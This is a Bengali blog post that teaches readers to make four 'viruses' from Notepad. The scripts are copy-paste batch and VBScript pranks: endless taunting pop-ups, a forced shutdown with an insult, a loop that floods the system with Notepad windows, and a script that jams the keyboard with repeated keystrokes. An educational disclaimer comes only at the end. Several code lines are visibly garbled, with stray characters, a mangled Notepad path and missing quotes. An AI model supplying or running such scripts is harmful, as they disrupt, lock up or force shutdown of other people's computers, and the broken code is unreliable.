-->

খুব সহজে চারটি ভাইরাস তৈরি করা শিখুন - Learn how to make four viruses very easy

    খুব সহজে চারটি ভাইরাস তৈরি করা শিখুন - Learn how to make four viruses very easy
    Learn how to make four viruses very easy

    খুব সহজে চারটি ভাইরাস তৈরি করা শিখুন। আসল ভাইরাস তৈরি করতে গেলে আপনাকে প্রোগ্রামিং জানা লাগবে। তবে নোটপ্যাডে কোড বসিয়ে কিছু মজার করার জন্য ভাইরাস তৈরি করা যায়। আপনার কম্পিউটারে নোটপ্যাড অ্যাপলিকেশন টি চালু করে তাতে নিচের কোড গুলো কপি করে বসিয়ে সেভ করবেন।
    ১. প্রথমে আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat নামে সেভ করুন। তারপর ফাইলটিতে ডাবল ক্লিক করলেই আপনার কম্পিউটার বার বার মেসেজ দিতে থাকবে।
    @ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN২. আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat নামে সেভ করুন। তারপর ফাইলটিতে ডাবল ক্লিক করলে আপনার কম্পিউটারে একটি মেসেজ দিয়ে বন্ধ হয়ে যাবে।
    wx@echo off msg * I don’t like you shutdown -c Error! You are too stupid! -s
    ৩. আপনার নোটপ্যাড টি খুলন তার নিচের কোডটি কপি করে nix.bat নামে সেভ করুন। তারপর ফাইলটিতে ডাবল ক্লিক করলে দেখবেন আপনার কম্পিউটারে নোটপ্যাড বার বার ওপেন হচ্ছে।
    Type : @ECHO off :top START %SystemRoot%\system32 otepad.exe GOTO top
    ৪. আপনার নোটপ্যাডটি খুলে নিচের কোড টি কপি করে নিন এবং ngx.vbs নামে সেভ করুন। এবার ফাইলটাতে ডাবল ক্লিক করলেই আপনার কিবোর্ড হ্যাং হয়ে যাবে।
    Type : Set wshShell = wscript.CreateObject(WScript.Shell) do wscript.sleep 100 wshshell.sendkeys You are a fool. loop
    এই পোস্টটি সম্পূর্ণ শিক্ষামূলক উদ্দেশ্যে করা হচ্ছে, কারো কোন ক্ষতি করার জন্য নয়। তাই অনুগ্রহ করে একটা শেখার জন্য শিখুন। কারো ক্ষতি করার চেষ্টা করবেন না।


    MR Laboratory Public Blog

    আমাদের এই ব্লগে আপনি ও  লিখতে পারবেন । এর জন্য আপনি আপনার লিখা আমাদেরকে ইমেইল করতে পারেন । অথবা আমাদের একজন সদস্য হয়ে ও পোস্ট করতে পারবেন । 

    আমাদের ওয়েবসাইট এর সদস্য হতে চাইলে ভিসিট করুন । 

    আপ্বনার লিখা অবস্যয় শিক্ষনীয় হতে হবে ।
    আমাদের ইমেইল ঠিকানা
    support@mrlaboratory.com


    Copyright © MR Laboratory
    Newer post Older post

    RELATED ARTICLES